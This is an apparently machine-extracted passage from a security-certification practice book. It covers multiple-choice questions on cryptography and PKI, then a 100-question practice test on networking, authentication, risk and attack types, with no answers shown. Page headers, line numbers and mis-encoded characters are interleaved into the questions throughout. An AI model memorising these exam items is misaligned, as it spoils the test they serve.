6689following is an example of a one-way encryption?
6690A. Symmetric algorithm
6691B.
6692HashingChapter 6
6693C. Asymmetric algorithm
6694D. PKI
6695â–
6696Cryptography and PKI
6697136. Which of the following transpires in a PKI environment?
6698A. The CA signs the certificate.
6699B. The RA signs the certificate.
6700C. The RA creates the certificate and the CA signs it.
6701D. The CA creates the certificate and the RA signs it.
6702137. Which of the following statements best describes how a digital signature is created?
6703A. The sender encrypts a message digest with the receiver’s public key.
6704B. The sender encrypts a message digest with the receiver’s private key.
6705C. The sender encrypts a message digest with his or her private key.
6706D. The sender encrypts a message digest with his or her public key.
6707138. AES is an algorithm used for which of the following?
6708A. Encrypting a large amount of data
6709B. Encrypting a small amount of data
6710C. Key recovery
6711D. Key revocation
6712139. PEAP protects authentication transfers by implementing which of the following?
6713A. TLS tunnels
6714B. SSL tunnels
6715C. AES
6716D. SHA hashes
6717140. AES-CCMP uses a 128-bit temporal key and encrypts data in what block size?
6718A. 256
6719141.
6720B. 192
6721C. 128
6722D. 64
6723Which of the following implement Message Integrity Code (MIC)? (Choose two.)
6724A. AES
6725B. DES
6726C. CCMP
6727D. TKIP
6728191Chapter 6
6729192
6730â–
6731Cryptography and PKI
6732142. James, a WLAN security engineer, recommends to management that WPA-Personal secu-
6733rity should not be deployed within the company’s WLAN for their vendors. Which of the
6734following statements best describe James’s recommendation? (Choose two.)
6735A. Static preshared passphrases are susceptible to social engineering attacks.
6736B. WPA-Personal uses public key encryption.
6737C. WPA-Personal uses a weak TKIP encryption.
6738D. WPA-Personal uses a RADIUS authentication server.
6739143. Which of the following is correct regarding root certificates?
6740A. Root certificates never expire.
6741B. A root certificate contains the public key of the CA.
6742C. A root certificate contains information about the user.
6743D. A root certificate cannot be used to authorize subordinate CAs to issue certificates on
6744its behalf.
6745144. Which of the following statements are correct about public and private key pairs?
6746(Choose two.)
6747A. Public and private keys work in isolation of each other.
6748B. Public and private keys work in conjunction with each other as a team.
6749C. If the public key encrypts the data using an asymmetric encryption algorithm, the
6750corresponding private key is used to decrypt the data.
6751D. If the private key encrypts the data using an asymmetric encryption algorithm, the
6752receiver uses the same private key to decrypt the data.
6753145. Which of the following are the filename extensions for PKCS #12 files? (Choose two.)
6754A. .p12
6755B. .KEY
6756C. .pfx
6757D. .p7b
6758146. Your company has discovered that several confidential messages have been intercepted.
6759You decide to implement a web of trust to encrypt the files. Which of the following are
6760used in a web of trust concept? (Choose two.)
6761A. RC4
6762B. AES
6763C. PGP
6764D. GPG
6765147. Which of the following algorithms is typically used to encrypt data-at-rest?
6766A. Symmetric
6767B. Asymmetric
6768C. Stream
6769D. HashingChapter 6
6770â–
6771Cryptography and PKI
6772193
6773148. Which of the following can assist in the workload of the CA by performing identification
6774and authentication of users requesting certificates?
6775A. Root CA
6776B. Intermediate CA
6777C. Registered authority
6778D. OSCP
6779149. You recently upgraded your wireless network so that your devices will use the 802.11n
6780protocol. You want to ensure all communication on the wireless network is secure with
6781the strongest encryption. Which of the following is the best choice?
6782A. WEP
6783B. WPA
6784C. WPA2
6785D. WPS
6786150. A college wants to move data to a USB flash drive and has asked you to suggest a way to
6787secure the data in a quick manner. Which of the following would you suggest?
6788A. 3DES
6789B. SHA-256
6790C. AES-256
6791D. SHA-512Chapter
67927
6793Practice TestChapter 7
6794196
6795â–
6796Practice Test
67971. You are asked to separate the Sales and Marketing department’s network traffic on a
6798layer 2 device within a LAN. This will reduce broadcast traffic and prevent the depart-
6799ments from seeing each other’s resources. Which of the following types of network design
6800would be the best choice?
6801A. MAC
6802B. NAT
6803C. VLAN
6804D. DMZ
68052. You are a network administrator and your company has asked you to perform a survey of
6806the campus for open Wi-Fi access points. You walk around with your smartphone look-
6807ing for unsecured access points that you can connect to without a password. What type of
6808penetration testing concept is this called?
6809A. Escalation of privilege
6810B. Active reconnaissance
6811C. Passive reconnaissance
6812D. Black-box
68133. Which of the following is a certificate-based authentication that allows individuals access
6814to U.S. federal resources and facilities?
6815A. Proximity card
6816B. TOTP
6817C. PIV card
6818D. HOTP
68194. You attempt to log into your company’s network with a laptop. The laptop is quarantined
6820to a restricted VLAN until the laptop’s virus definitions are updated. Which of the follow-
6821ing best describes this network component?
6822A. NAT
6823B. HIPS
6824C. DMZ
6825D. NAC
68265. You have been asked to implement a security control that will limit tailgating in high-
6827secured areas. Which of the following security control would you choose?
6828A. Mantrap
6829B. Faraday cage
6830C. Airgap
6831D. Cable locks
68326. Your company’s network administrator is placing an Internet web server in an isolated
6833area of the company’s network for security purposes. Which of the following architecture
6834concepts is the network administrator implementing?
6835A. Honeynet
6836B.
6837DMZChapter 7
6838C. Proxy
6839D. Intranet
6840â–
6841Practice Test
6842197
68437. Your company is offering a new product on its website. You are asked to ensure availabil-
6844ity of the web server when it receives a large number of requests. Which of the following
6845would be the best option to fulfill this request?
6846A. VPN concentrator
6847B. NIPS
6848C. SIEM
6849D. Load balancer
68508. You are a security administrator for a manufacturing company that produces com-
6851pounded medications. To ensure individuals are not accessing sensitive areas where the
6852medications are created, you want to implement a physical security control. Which of the
6853following would be the best option?
6854A. Security guard
6855B. Signs
6856C. Faraday cage
6857D. Cameras
68589. An attacker exploited a bug, unknown to the developer, to gain access to a database
6859server. Which of the following best describes this type of attack?
6860A. Zero-day
6861B. Cross-site scripting
6862C. ARP poisoning
6863D. Domain hijacking
686410. A new employee added network drops to a new section of the company’s building. The
6865cables were placed across several fluorescent lights. When users attempted to connect to
6866the data center on the network, they experienced intermittent connectivity. Which of the
6867following environmental controls was the most likely cause of this issue?
6868A. DMZ
6869B. EMI
6870C. BIOS
6871D. TPM
687211. What method should you choose to authenticate a remote workstation before it gains
6873access to a local LAN?
6874A. Router
6875B. Proxy server
6876C. VPN concentrator
6877D. FirewallChapter 7
6878198
6879â–
6880Practice Test
688112. Which of the following allows a company to store a cryptographic key with a trusted
6882third party and release it only to the sender or receiver with proper authorization?
6883A. CRL
6884B. Key escrow
6885C. Trust model
6886D. Intermediate CA
688713. Your company recently upgraded the HVAC system for its server room. Which of the fol-
6888lowing security implications would the company be most concerned about?
6889A. Confidentiality
6890B. Availability
6891C. Integrity
6892D. Airgap
689314. Your company provides secure wireless Internet access to visitors and vendors working
6894onsite. Some of the vendors are reporting they are unable to view the wireless network.
6895Which of the following best describes the issue?
6896A. MAC filtering is enabled on the WAP.
6897B. The SSID broadcast is disabled.
6898C. The wrong antenna type is being used.
6899D. The wrong band selection is being used.
690015. Your company’s sales team is working late at the end of the month to ensure all sales are
6901reported for the month. The sales members notice they cannot save or print reports after
6902regular hours. Which of the following general concepts is preventing the sales members
6903from performing their job?
6904A. Job rotation
6905B. Time-of-day restrictions
6906C. Least privilege
6907D. Location-based policy
690816. Which of the following symmetric algorithms are block ciphers? (Choose three.)
6909A. 3DES
6910B. ECDHE
6911C. RSA
6912D. RC4
6913E. SHA
6914F. TwofishChapter 7
6915â–
6916Practice Test
6917199
691817. A security officer has asked you to use a password cracking tool on the company’s comput-
6919ers. Which of the following best describes what the security officer is trying to accomplish?
6920A. Looking for strong passwords
6921B. Enforcing a minimum password length policy
6922C. Enforcing a password complexity policy
6923D. Looking for weak passwords
692418. Which of the following test gives testers comprehensive network design information?
6925A. White box
6926B. Black box
6927C. Gray box
6928D. Purple box
692919. You are the network administrator for your company and want to implement a wire-
6930less network and prevent unauthorized access. Which of the following would be the best
6931option?
6932A. RADIUS
6933B. TACACS+
6934C. Kerberos
6935D. OAUTH
693620. Why is input validation important to secure coding techniques? (Choose two.)
6937A. It mitigates shoulder surfing.
6938B. It mitigates buffer overflow attacks.
6939C. It mitigates ARP poisoning.
6940D. It mitigates XSS vulnerabilities.
694121. To authenticate, a Windows 10 user draws a circle around a picture of a dog’s nose and
6942then touches each ear starting with the right ear. Which of the following concepts is this
6943describing?
6944A. Something you do
6945B. Something you know
6946C. Something you have
6947D. Somewhere you are
694822. Which of the following countermeasures is designed to best protect against a brute-force
6949password attack?
6950A. Password complexity
6951B. Account disablement
6952C. Password length
6953D. Account lockoutChapter 7
6954200
6955â–
6956Practice Test
695723. You are a security administrator reviewing the results from a network security audit. You
6958are reviewing options to implement a solution to address the potential poisoning of name
6959resolution server records. Which of the following would be the best choice?
6960A. SSL
6961B. SSH
6962C. DNSSEC
6963D. TLS
696424. Your manager has implemented a new policy that requires employees to shred all sensitive
6965documents. Which of the following attacks is your manager attempting to prevent?
6966A. Tailgating
6967B. Dumpster diving
6968C. Shoulder surfing
6969D. Man-in-the-middle
697025. Which of the following cryptography algorithms support multiple bit strengths?
6971A. DES
6972B. HMAC
6973C. MD5
6974D. AES
697526. A network security auditor will perform various simulated network attacks against your
6976company’s network. Which should the security auditor acquire first?
6977A. Vulnerability testing authorization
6978B. Transfer risk response
6979C. Penetration testing authorization
6980D. Change management
698127. A system administrator is told an application is not able to handle the large amount of traffic
6982the server is receiving on a daily basis. The attack takes the server offline and causes it to drop
6983packets occasionally. The system administrator needs to find another solution while keeping
6984the application secure and available. Which of the following would be the best solution?
6985A. Sandboxing
6986B. DMZ
6987C. Cloud computing
6988D. DLP
698928. You are a security administrator and are observing unusual behavior in your network
6990from a workstation. The workstation is communicating with a known malicious destina-
6991tion over an encrypted tunnel. You have updated the antivirus definition files and per-
6992formed a full antivirus scan. The scan doesn’t show any clues of infection. Which of the
6993following best describes what has happened on the workstation?
6994A. Buffer overflow
6995B.
6996Session hijackingChapter 7
6997C. Zero-day attack
6998D. DDoS
6999â–
7000Practice Test
7001201
700229. You are the security engineer and have discovered that communication within your com-
7003pany’s encrypted wireless network is being captured with a sniffing program. The data
7004being captured is then being decrypted to obtain the employee’s credentials to be used at
7005a later time. Which of the following protocols is most likely being used on the wireless
7006access point? (Choose two.)
7007A. WPA2 Personal
7008B. WPA2 Enterprise
7009C. WPA
7010D. WEP
701130. A network manager has implemented a strategy so that all workstations on the network
7012will receive required security updates regularly. Which of the following best describes
7013what the network manager implemented?
7014A. Sandboxing
7015B. Ad hoc
7016C. Virtualization
7017D. Patch management
701831. Your manager wants to secure the FTP server by using SSL. Which of the following
7019should you configure?
7020A. FTPS
7021B. SFTP
7022C. SSH
7023D. LDAPS
702432. You are an IT security officer and you want to classify and assess privacy risks throughout
7025the development life cycle of a program or system. Which of the following tools would be
7026best to use for this purpose?
7027A. BIA
7028B. PIA
7029C. RTO
7030D. MTBF
703133. Which of the following types of risk analysis makes use of ALE?
7032A. Qualitative
7033B. ROI
7034C. SLE
7035D. QuantitativeChapter 7
7036202
7037â–
7038Practice Test
703934. Which of the following statements best describes mandatory vacations?
7040A. Companies ensure their employees can take time off to conduct activities together.
7041B. Companies use them as a tool to ensure employees are taking the correct amount of
7042days off.
7043C. Companies ensure their employees are properly recharged to perform their duties.
7044D. Companies use them as a tool for security protection to detect fraud.
704535. Users of your company have been visiting the website www.abccompany.com and a recent
7046increase in virus detection has been noted. Your company has developed a relationship
7047with another company using the web address www.abccompany.com, but not with the site
7048that has been causing the increase of viruses. Which of the following would best describe
7049this attack?
7050A. Session hijacking
7051B. Cross-site scripting
7052C. Replay attack
7053D. Typo squatting
705436. Which of the following would you enable in a laptop’s BIOS to provide full disk
7055encryption?
7056A. RAID
7057B. USB
7058C. HSM
7059D. TPM
706037. Your company has hired a third-party auditing firm to conduct a penetration test against
7061your network. The firm wasn’t given any information related to the company’s network.
7062What type of test is the company performing?
7063A. White box
7064B. Red box
7065C. Black box
7066D. Gray box
706738. Server room access is controlled with proximity cards and records all entries and exits.
7068These records are referred to if missing equipment is discovered, so employees can be iden-
7069tified. Which of the following must be prevented for this policy to become effective?
7070A. Shoulder surfing
7071B. Tailgating
7072C. Vishing
7073D. Dumpster divingChapter 7
7074â–
7075Practice Test
7076203
707739. Company users are stating they are unable to access the network file server. A company
7078security administrator checks the router ACL and knows users can access the web server,
7079email server, and printing services. Which of the following is preventing access to the net-
7080work file server?
7081A. Implicit deny
7082B. Port security
7083C. Flood guard
7084D. Signal strength
708540. An employee informs you that the Internet connection is slow and they are having diffi-
7086culty accessing websites to perform their job. You analyze their computer and discover the
7087MAC address of the default gateway in the ARP cache is not correct. What type of attack
7088have you discovered?
7089A. DNS poisoning
7090B. Injection
7091C. Impersonation
7092D. ARP poisoning
709341. Tony, a college student, downloaded a free word editor program to complete his essay.
7094After downloading and installing the software, Tony noticed his computer was running
7095slow and he was receiving notifications from his antivirus program. Which of the follow-
7096ing best describes the malware that he installed?
7097A. Keylogger
7098B. Worm
7099C. Ransomware
7100D. Trojan
710142. Which of the following measures the amount of time required to return a failed device,
7102component, or network to normal functionality?
7103A. RTO
7104B. MTTR
7105C. MTBF
7106D. RPO
710743. Natural disasters and intentional man-made attacks can cause the death of employees and
7108customers. What type of impact is this?
7109A. Safety
7110B. Life
7111C. Finance
7112D. ReputationChapter 7
7113204
7114â–
7115Practice Test
711644. A user finds and downloads an exploit that will take advantage of website vulnerabilities.
7117The user isn’t knowledgeable about the exploit and runs the exploit against multiple web-
7118sites to gain access. Which of the following best describes this user?
7119A. Man-in-the-middle
7120B. Script kiddie
7121C. White hat
7122D. Hacktivist
712345. You are the IT security officer and you plan to develop a general cybersecurity aware-
7124ness training program for the employees. Which of the following best describes these
7125Âemployees?
7126A. Data owners
7127B. Users
7128C. System administrators
7129D. System owners
713046. The system administrator needs to secure the company’s data-at-rest. Which of the follow-
7131ing would provide the strongest protection?
7132A. Implement biometrics controls on each workstation.
7133B. Implement full-disk encryption.
7134C. Implement a host intrusion prevention system.
7135D. Implement a host intrusion detection system.
713647. Which of the following is a true statement about qualitative risk analysis?
7137A. It uses numeric values to measure the impact of risk.
7138B. It uses descriptions and words to measure the impact of risk.
7139C. It uses industry best practices and records.
7140D. It uses statistical theories, testing, and experiments.
714148. Which of the following firewalls tracks the operating state and characteristics of network
7142connections traversing it?
7143A. Stateful firewall
7144B. Stateless firewall
7145C. Application firewall
7146D. Packet filter firewall
714749. Which of the following are examples of PII? (Choose two.)
7148A. Fingerprint
7149B. MAC address
7150C. Home address
7151D. GenderChapter 7
7152â–
7153Practice Test
7154205
715550. An employee informs you they have lost a corporate mobile device. What is the first action
7156you perform?
7157A. Enable push notification services.
7158B. Remotely wipe the mobile device.
7159C. Enable screen lock.
7160D. Enable geofencing.
716151. You have created a backup routine that includes a full backup each Sunday night and
7162a backup each night of all data that has changed since Sunday’s backup. Which of the fol-
7163lowing best describes this backup schedule?
7164A. Full and incremental
7165B. Full and differential
7166C. Snapshots
7167D. Full
716852. One of your colleagues attempted to ping a computer name and received the response of
7169fe80::3281:80ea:b72b:0b55. What type of address did the colleague view?
7170A. IPv6
7171B. IPv4
7172C. MAC address
7173D. APIPA
717453. Which of the following defines the act of sending unsolicited messages to nearby Blue-
7175tooth devices?
7176A. Jamming
7177B. Bluesnarfing
7178C. Brute force
7179D. Bluejacking
718054. You are a system administrator and you are creating a public and private key pair. You
7181have to specify the key strength. Which of the following would be your best choice?
7182A. RSA
7183B. DES
7184C. MD5
7185D. SHA
718655. You are the security administrator for the sales department and the department needs to
7187email high volumes of sensitive information to clients to help close sales. All emails go
7188through a DLP scanner. Which of the following is the best solution to help the department
7189protect the sensitive information?
7190A. Automatically encrypt outgoing emails.
7191B.
7192Monitor all outgoing emails.Chapter 7
7193206
7194â–
7195Practice Test
7196C. Automatically encrypt incoming emails.
7197D. Monitor all incoming emails.
719856. You are the IT security officer of your company and have established a security policy
7199that requires users to protect all sensitive documents to avoid their being stolen. What
7200policy have you implemented?
7201A. Separation of duties
7202B. Clean desk
7203C. Job rotation
7204D. Privacy
720557. Which of the following options can a security administrator deploy on a mobile device that
7206will deter undesirable people from seeing the data on the device if it is left unattended?
7207A. Screen lock
7208B. Push notification services
7209C. Remote wipe
7210D. Full device encryption
721158. You are a system administrator and are asked to prevent staff members from using each
7212other’s credentials to access secured areas of the building. Which of the following will best
7213address this request?
7214A. Install a biometric reader at the entrance of the secure area.
7215B. Install a proximity card reader at the entrance of the secure area.
7216C. Implement least privilege.
7217D. Implement group policy enforcement.
721859. A sales manager has asked for an option for sales reps who travel to have secure remote
7219access to your company’s database server. Which of the following should you configure
7220for the sales reps?
7221A. VPN
7222B. WLAN
7223C. NAT
7224D. Ad hoc
722560. An attacker tricks one of your employees into clicking on a malicious link that causes an
7226unwanted action on the website the employee is currently authenticated to. What type of
7227attack is this?
7228A. Replay
7229B. Cross-site request forgery
7230C. Cross-site scripting
7231D. Buffer overflowChapter 7
7232â–
7233Practice Test
7234207
723561. Which of the following is considered the strongest access control?
7236A. RBAC
7237B. DAC
7238C. MAC
7239D. ABAC
724062. Your company wants to expand its data center, but has limited space to store additional
7241hardware. The IT staff needs to continue their operations while expansion is underway.
7242Which of the following would best accomplish this expansion idea?
7243A. IaaS
7244B. Virtualization
7245C. SaaS
7246D. Public cloud
724763. Which of the following algorithms have known collisions? (Choose two.)
7248A. MD5
7249B. AES
7250C. SHA
7251D. SHA-256
7252E. RSA
725364. Which of the following must a security administrator implement to allow customers, ven-
7254dors, suppliers, and other businesses to obtain information while preventing access to the
7255company’s entire network?
7256A. Intranet
7257B. Internet
7258C. Extranet
7259D. Honeynet
726065. The head of HR is conducting an exit interview with an IT network administrator named
7261Matt. The interview questions include Matt’s view of his manager, why he is leaving his
7262current position, and what he liked most about his job. Which of the following should
7263also be addressed in this exit interview?
7264A. Job rotation
7265B. NDA
7266C. Background checks
7267D. Property return form
726866. Which of the following is considered the least secure authentication method?
7269A. TACACS+
7270B. CHAP
7271C. NTLM
7272D. PAPChapter 7
7273208
7274â–
7275Practice Test
727667. You are a security administrator for your company and have been asked to recommend a
7277secure method for storing passwords due to recent brute-force attempts. Which of the fol-
7278lowing will provide the best protection? (Choose two.)
7279A. ROT13
7280B. BCRYPT
7281C. RIPEMD
7282D. PBKDF2
728368. You installed a WAP for a local coffee shop and have discovered the signal is extending
7284into the parking lot. Which of the following configurations will best correct this issue?
7285A. Change the antenna type.
7286B. Disable the SSID broadcast.
7287C. Reduce the signal strength for indoor coverage only.
7288D. Enable MAC filtering to prevent devices from accessing the wireless network.
728969. You are a network administrator for a bank. A branch manager discovers that the desk-
7290side employees have the ability to delete lending policies found in a folder within the file
7291server. You review the permissions and notice the deskside employees have “modifyâ€
7292permissions to the folder. The employees should have read permissions only. Which of the
7293following security principles has been violated?
7294A. Job rotation
7295B. Time-of-day restrictions
7296C. Separation of duties
7297D. Least privilege
729870. Which of the following concepts of cryptography ensures integrity of data by the use of
7299digital signatures?
7300A. Key stretching
7301B. Steganography
7302C. Key exchange
7303D. Hashing
730471. Your manager has asked you to recommend a public key infrastructure component to
7305store certificates that are no longer valid. Which of the following is the best choice?
7306A. Intermediate CA
7307B. CSR
7308C. CRL
7309D. Key escrow
731072. You are a backup operator and receive a call from a user asking you to send sensitive docu-
7311ments immediately because their manager is going to a meeting with the company’s executives.
7312The user states the manager’s files are corrupted and he is attending the meeting in the next 5
7313minutes. Which of the following forms of social engineering best describes this situation?
7314A. Scarcity
7315B.
7316ConsensusChapter 7
7317C. Intimidation
7318D. Authority
7319â–
7320Practice Test
7321209
732273. Which of the following controls can you implement together to prevent data loss if a
7323mobile device is lost or stolen? (Choose two.)
7324A. Geofencing
7325B. Full-device encryption
7326C. Screen locks
7327D. Push notification services
732874. You are asked to find the MAC address on a Linux machine. Which of the following
7329commands can you use to discover it?
7330A. ipconfig
7331B. ifconfig
7332C. tracert
7333D. ping
733475. A chief security officer (CSO) notices that a large number of contractors work for the
7335company. When a contractor leaves the company, the provisioning team is not notified.
7336The CSO wants to ensure the contractors cannot access the network when they leave.
7337Which of the following polices best supports the CSO’s plan?
7338A. Account disablement
7339B. Account lockout policy
7340C. Enforce password history
7341D. Account expiration policy
734276. The CISO wants to strengthen the password policy by adding special characters to users’
7343passwords. Which of the following control best achieves this goal?
7344A. Password complexity
7345B. Password length
7346C. Password history
7347D. Group policy
734877. Which of the following deployment models allows a business to have more control of the
7349devices given to employees that handle company information?
7350A. DLP
7351B. COPE
7352C. BYOD
7353D. CYODChapter 7
7354210
7355â–
7356Practice Test
735778. A network administrator uses their fingerprint and enters a PIN to log onto a server.
7358Which of the following best describes this example?
7359A. Identification
7360B. Single authentication
7361C. Multifactor authentication
7362D. Transitive trust
736379. Your company wants to perform a privacy threshold assessment (PTA) to identify all PII
7364residing in its systems before retiring hardware. Which of the following would be exam-
7365ples of PII? (Choose two.)
7366A. Date of birth
7367B. Email address
7368C. Race
7369D. Fingerprint
737080. Your HIPS is incorrectly reporting legitimate network traffic as suspicious activity. What
7371is this best known as?
7372A. False positive
7373B. False negative
7374C. Credentialed
7375D. Noncredentialed
737681. Matt, a network administrator, is asking how to configure the switches and routers to
7377securely monitor their status. Which of the following protocols would he need to imple-
7378ment on the devices?
7379A. SSH
7380B. SNMP
7381C. SMTP
7382D. SNMPv3
738382. Your company has issued a hardware token-based authentication to administrators to
7384reduce the risk of password compromise. The tokens display a code that automatically
7385changes every 30 seconds. Which of the following best describes this authentication
7386mechanism?
7387A. TOTP
7388B. HOTP
7389C. Smartcard
7390D. Proximity cardChapter 7
7391â–
7392Practice Test
7393211
739483. You are the network administrator for your company’s Microsoft network. Your CISO is
7395planning the network security and wants a secure protocol that will authenticate all users
7396logging into the network. Which of the following authentication protocols would be the
7397best choice?
7398A. RADIUS
7399B. TACACS+
7400C. Kerberos
7401D. SAML
740284. Which of the following is not a vulnerability of end-of-life systems?
7403A. When systems can’t be updated, firewalls and antiviruses are not sufficient
7404protection.
7405B. Out-of-date systems can result in fines in regulated industries.
7406C. When an out-of-date system reaches the end-of-life, it will automatically shut down.
7407D. Operating out-of-date systems can result in poor performance and reliability and can
7408lead to denial of services.
740985. Which of the following statements are true regarding viruses and worms? (Choose two.)
7410A. A virus is a malware that self-replicates over the network.
7411B. A worm is a malware that self-replicates over the network.
7412C. A virus is a malware that replicates by attaching itself to a file.
7413D. A worm is a malware that replicates by attaching itself to a file.
741486. Which of the following wireless attacks would be used to impersonate another WAP to
7415obtain unauthorized information from nearby mobile users?
7416A. Rogue access point
7417B. Evil twin
7418C. Bluejacking
7419D. Bluesnarfing
742087. Tony, a security administrator, discovered through an audit that all the company’s access
7421points are currently configured to use WPA with TKIP for encryption. Tony needs to
7422improve the encryption on the access points. Which of the following would be the best
7423option for Tony?
7424A. WPA2 with CCMP
7425B. WEP
7426C. WPA with CCMP
7427D. WPSChapter 7
7428212
7429â–
7430Practice Test
743188. Your department manager assigns Tony, a network administrator, the job of expressing
7432the business and financial effects that a failed SQL server would cause if it was down for
74334 hours. What type of analysis must Tony perform?
7434A. Security audit
7435B. Asset identification
7436C. Business impact analysis
7437D. Disaster recovery plan
743889. You are the security administrator for a local hospital. The doctors want to prevent the
7439data from being altered while working on their mobile devices. Which of the following
7440would most likely accomplish the request?
7441A. Cloud storage
7442B. Wiping
7443C. SIEM
7444D. SCADA
744590. You are a Unix engineer, and on October 29 you discovered that a former employee had
7446planted malicious code that would destroy 4,000 servers at your company. This mali-
7447cious code would have caused millions of dollars worth of damage and shut down your
7448company for at least a week. The malware was set to detonate at 9:00 a.m. on January 31.
7449What type of malware did you discover?
7450A. Logic bomb
7451B. RAT
7452C. Spyware
7453D. Ransomware
745491. Which of the following is defined as hacking into a computer system for a politically or
7455socially motivated purpose?
7456A. Hacktivist
7457B. Insider
7458C. Script kiddie
7459D. Evil twin
746092. A network administrator with your company has received phone calls from an individual
7461who is requesting information about their personal finances. Which of the following type
7462of attack is occurring?
7463A. Whaling
7464B. Phishing
7465C. Vishing
7466D. Spear phishingChapter 7
7467â–
7468Practice Test
7469213
747093. Which of the following can be restricted on a mobile device to prevent security violations?
7471(Choose three.)
7472A. Third-party app stores
7473B. Biometrics
7474C. Content management
7475D. Rooting
7476E. Sideloading
747794. Which of the following does a remote access VPN usually rely on? (Choose two.)
7478A. IPSec
7479B. DES
7480C. SSL
7481D. SFTP
748295. Matt, a security administrator, wants to use a two-way trust model for the owner of a cer-
7483tificate and the entity relying on the certificate. Which of the following is the best option
7484to use?
7485A. WPA
7486B. Object identifiers
7487C. PFX
7488D. PKI
748996. If domain A trusts domain B, and domain B trusts domain C, then domain A trusts
7490domain C. Which concept does this describe?
7491A. Multifactor authentication
7492B. Federation
7493C. Single sign-on
7494D. Transitive trust
749597. A user entered a username and password to log into the company’s network. Which of the
7496following best describes the username?
7497A. Authorization
7498B. Authentication
7499C. Identification
7500D. Accounting
750198. Which of the following tools can be used to hide messages within a file?
7502A. Data sanitization
7503B. Steganography
7504C. Tracert
7505D. Network mapping
750699. Which of the following is best used to prevent ARP poisoning on a local network?
7507(Choose two.)
7508A. Antivirus
7509B. Static ARP entries
7510C. Patching management
7511D. Port security
7512100. Which of the following is the best practice to place at the end of an ACL?
7513A. USB blocking
7514B. Time synchronization
7515C. MAC filtering
7516D. Implicit deny